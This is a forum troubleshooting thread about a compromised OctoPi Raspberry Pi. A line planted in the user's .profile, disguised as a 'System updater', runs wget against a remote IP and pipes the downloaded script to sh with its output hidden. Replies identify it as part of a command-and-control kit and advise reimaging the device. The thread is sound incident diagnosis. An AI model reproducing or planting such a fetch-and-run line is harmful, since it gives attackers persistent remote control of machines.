Ssh login strange process

sek_is_back · September 25, 2020, 6:24pm

What is the problem?
after I logged me in via Putty on ssh, there is no prompt rather a process which try to connect to http://161.35.78.255/system_manager.sh

25-09-_2020_20-02-25

I can press ctrl + c to interupt and to get a prompt
I dont know what this is

What did you already try to solve it?
tried to find it with grep -Ril "system_manager.sh"

Logs (syslog, dmesg, ... no logs, no support)
cat auth.log.1 | grep "161.35.78.255"
Sep 15 03:05:08 octopi sshd[19134]: Accepted password for pi from 161.35.78.255 port 45794 ssh2
Sep 15 03:05:08 octopi sshd[19171]: Accepted password for pi from 161.35.78.255 port 45802 ssh2

Additional information about your network (Hardware you are trying to connect to, hardware you are trying to connect from, router, access point, used operating systems, ...)

Ewald_Ikemann · September 25, 2020, 6:50pm

I use thes auth settings:

grafik

maybe there is something messed up in the putty settings

jandar · September 25, 2020, 7:28pm

Maybe there is something in .profile or .bashrc or so.

Try to login as root and see if the same problem occurs with su - pi.

b-morgan · September 25, 2020, 7:59pm

Please provide some of the missing information. My first guess is that your system has been hacked. Could be the system you are connecting from or the RPi you are connecting to.

sek_is_back · September 26, 2020, 5:57am

@ Ewald
i checked my settings, they are the same.
I have the same behaviar from windows comandline when I do ssh pi@192.168.0.17

Additional information about your network
Host System Windows 10
Raspberry Pi 3B
OctoPrint version : 1.4.2
OctoPi version : 0.17.0
LAN Connection vi HUB

@ jandar
Bam you were right, I checked the .profile and the last entry is

 # System updater below
 wget http://161.35.78.255/system_manager.sh -O- | sh > /dev/null 2>&1

so i comment it out and now I have a normal behaviar.

Thx all for your time and your help.
So ill check where it come from...

foosel · September 26, 2020, 6:37am

This looks like someone got access to your system (did you create a port forward to SSH but did not set a strong password or better public key login only? Don't do that) and installed half of a command and control kit to make it part of a bot server. If I were you I'd nuke this and flash a fresh image, then rethink your network security. This machine looks compromised.

sek_is_back · September 26, 2020, 8:28am

mhhh could be and yes sounds like, few month ago I played with some remote access via vpn.
So ill check my network and clean up my system, thanks all for your help